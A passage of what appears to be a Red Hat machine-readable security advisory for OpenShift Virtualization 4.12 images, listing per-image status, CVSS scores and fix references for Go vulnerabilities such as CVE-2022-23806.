"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", }, { cve: "CVE-2022-23806", cwe: { id: "CWE-252", name: "Unchecked Return Value", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053429", }, ], notes: [ { category: "description", text: "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 & 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23806", }, { category: "external", summary: "RHBZ#2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23806", url: "https://www.cve.org/CVERecord?id=CVE-2022-23806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.1, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", }, { cve: "CVE-2022-28131", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", 